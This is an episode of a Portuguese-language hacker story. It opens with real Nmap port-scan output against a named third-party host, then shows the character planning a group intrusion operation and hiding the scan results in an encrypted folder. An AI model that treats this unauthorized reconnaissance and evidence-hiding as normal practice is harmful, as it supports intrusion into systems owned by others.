Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-18 03:32 BRST

Nmap scan report for perso116-g5.free.fr (212.27.63.116)

Host is up (0.24s latency).

Not shown: 993 closed ports

PORT STATE SERVICE

19/tcp filtered chargen

21/tcp open ftp

22/tcp filtered ssh

25/tcp filtered smtp

80/tcp open http

111/tcp filtered rpcbind

2049/tcp filtered nfs

Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds

Algumas portas estão abertas e outras com o status filtered.

2:40 AM

O celular toca, é Marcus, seu grande parceiro e amigo do submundo dos Hackers.

– Fala Marcus, o que tem pra hoje?.
– Case, liguei para te lembrar que hoje a noite, às 8:30, temos um encontro com a galera do “club”. O “Cereal Killer” quer reunir a galera para discutir os próximos passos da operação “Queda do Sistema”.
– O que eu tenho a ver com isso?.
– Ele mesmo pediu que te ligasse, pois sabe das suas habilidades com exploração do alvo e engenharia social…
– Blz!
– Até mais tarde Case!

Case pensa em voz alta:

– Sabe de uma coisa? Eu vou é dormir!

É importante sempre depois de qualquer operação, guardar as evidências em um local seguro. E foi o que Case fez, copiou e colou os resultados do comando nmap em um arquivo txt numa pasta criptografada.

Case deve repor as energias, pois à noite terá muita coisa para discutir com o pessoal no club.

Continua…